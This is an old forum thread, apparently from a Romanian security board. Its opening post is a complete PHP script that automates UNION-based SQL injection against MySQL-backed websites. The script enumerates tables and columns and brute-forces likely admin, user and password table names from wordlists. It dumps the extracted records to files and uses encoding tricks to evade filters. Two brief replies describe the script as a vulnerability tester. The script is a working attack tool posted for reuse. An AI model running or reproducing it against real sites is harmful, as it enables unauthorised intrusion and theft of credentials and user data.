denjacker Posted April 28, 2011 Report Posted April 28, 2011 <?php//author:www.vul.krerror_reporting(0);ini_set("max_execution_time",0);ini_set("default_socket_timeout",10);$server=$argv[1];$mode=$argv[2];$database=$argv[3];$server=str_replace("\"","",$server);$num=0;if(!$server||!$mode){print_r('--------------------------Begin Code By www.vul.kr------------------------------Usage: php.exe '.$argv[0].' Url Options Database TableOptions:1 Show Union Number [MYSQL 4/5 VERSION]2 Show Tables [MYSQL 5 VERSION]3 Show Columns [MYSQL 5 VERSION]4 Show Content [MYSQL 4/5 VERSION]5 Guess Tables [MYSQL 4 VERSION]6 Guess Columns [MYSQL 4 VERSION]-------------------------------End-----------------------------------------');exit;}function str_todex($string){$num=strlen($string);for($i=0;$i<$num;$i++){$str=substr($string,$i,$i+1);$ascii=ord($str);$hex.=dechex($ascii);}$hex="0x".$hex;return $hex;}if($mode==1) {$injstr="0x5B676F6F676C656F72675D";$ins=$injstr;for($j=1;$j<=50;$j++){$expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23";echo ".."; $reponse=@file_get_contents($expurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Colnums Numbers: $j \r\n";break;}$injstr=$ins.",".$injstr;}$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=1;$k<=$j;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$expurl="%23";$rurl=$unum.$expurl;$fp=fopen("url.txt","w");fwrite($fp,$rurl);//echo "\r\n$rurl";echo "\r\n go and see url.txt";}elseif($mode==2){if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;}//-----------------------------get the NO of tables------------------------------------------------------------$expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurl0;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23";$rurl=$unum.$expurl1;$search=$argv[5]+500;$endurl=str_replace($search,$replacetext,$rurl);//---------------------------------------------------------------------------------------------$reponse1=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1);if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";}for($i=0;$i<$Tnum;$i++){echo "\r\n";//-----------------------------Get tables-----------------------------------------------------------$expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurfirst;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23";$rurl=$unum.$expurl;$endurl=str_replace($search,$replacetxt,$rurl);//------------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "Done!\r\n";break;}}}elseif($mode==3){$table=$argv[6];if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;}//--------------------------------get count colnums------------------------------------------------------------$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl2="%09FrOm%09information_schema.COLUMNS";$expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23";$rurl=$unum.$expurl2;$search=$argv[5]+500;$endurl=str_replace($search,$replacetx,$rurl);//---------------------------------------------------------------------------------------------$reponse2=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";}for($i=0;$i<$Cnum;$i++){//--------------------------------Get Colnums------------------------------------------------------------$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09information_schema.COLUMNS";$expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23";$rurl=$unum.$expurl;$search=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);//---------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "Down!\r\n";break;}}}//--------------------------MYSQL4.0 Guess table---------------------------------------elseif($mode==5) {if($argc<>5) {echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;}$tmptalble=array('users','user','admin','ident','adminlog','members','member','eq_users','tb_users','tbl_user','login','logging','nuke_users','admins','group_members','phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin','auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin','WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins','manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins','cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member','tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login','sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user','nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users','jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins','cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users');$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[3]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replay="0x5B676F6F676C656F72675D";$expurl="%09FrOm%09[chinapost]%23";$rurl=$unum.$expurl;$search=$argv[4]+500;$endurl=str_replace($search,$replay,$rurl);$endurl2=$endurl;//---------------------------------------------------------------------------------------------for($j=0;$j<count($tmptalble);$j++){$tb=$tmptalble[$j];$endurl=str_replace("[chinapost]",$tb,$endurl);$reponse=@file_get_contents($endurl);if(strstr($reponse,"[googleorg]")){echo "\r\nFind Table: ".$tmptalble[$j];}$endurl=$endurl2;}}//--------------------------MYSQL4.0 Guess Colnums---------------------------------------elseif($mode==6) {if($argc<>7){echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;}$tmpcol=array('id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd','login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass','usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy','Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin','user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw','pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth','adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass','admin_name','account','accounts','sb_admin_name','sb_pwd');$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[3]+500;$Gtable=$argv[6];$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replay="0x5B676F6F676C656F72675D";$expurl="%09FrOm%09".$Gtable."%23";$rurl=$unum.$expurl;$search=$argv[4]+500;$SeLeCtsearch=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);$endurl2=$endurl;//---------------------------------------------------------------------------------------------for($j=0;$j<count($tmpcol);$j++){$tb=$tmpcol[$j];$endurl=str_replace($SeLeCtsearch,$tb,$endurl);$reponse=@file_get_contents($endurl);if(strstr($reponse,"[googleorg]")){echo "\r\nFind Column: ".$tmpcol[$j];}$endurl=$endurl2;}}elseif($mode==4){$table=$argv[6];$column=$argv[7];$column2=$argv[8];if($argc<>9){echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;}//--------------------------------Get contents count-------------------------------------------------------------$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$UnIoNnum=$argv[4]+500;$data=$expurlexp;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=$data.substr($aall,0,strlen($aall)-1);$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";$expurl2="%09FrOm%09$database.$table%23";$rurl=$unum.$expurl2;$search=$argv[5]+500;$endurl=str_replace($search,$replacetx,$rurl);//---------------------------------------------------------------------------------------------$reponse2=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";}for($i=0;$i<$Cnum;$i++){//--------------------------------Get contents------------------------------------------------------------$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";$data=$expurlps;$aall="";$dote=",";for($k=501;$k<=$UnIoNnum;$k++){$aall=$aall.$k.$dote;}$unum=substr($data.$aall,0,strlen($data.$aall)-1);$replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)";$expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23";$rurl=$unum.$expurl;$search=$argv[5]+500;$endurl=str_replace($search,$replay,$rurl);//---------------------------------------------------------------------------------------------$reponse=@file_get_contents($endurl);preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);if($crack=($matchs[1])){$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}//else{echo "done!\r\n";break;}}}?>http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt 1 Quote
nedo Posted May 3, 2011 Report Posted May 3, 2011 (edited) E un script php care verifica daca este vulnerabila o baza de date.Le: Xander are dreptate, m-am exprimat gresit. De fapt testeaza daca o pagina care acceseaza o baza de date mysql 4/5 este vulnerabil la injectie sql. Edited May 3, 2011 by nedo Quote
Xander Posted May 3, 2011 Report Posted May 3, 2011 o baza de date nu are cum sa fie in sine vulnerabila lol... scriptul poate fi vulnerabil sau serverul bazei de date... dar baza de date nu Quote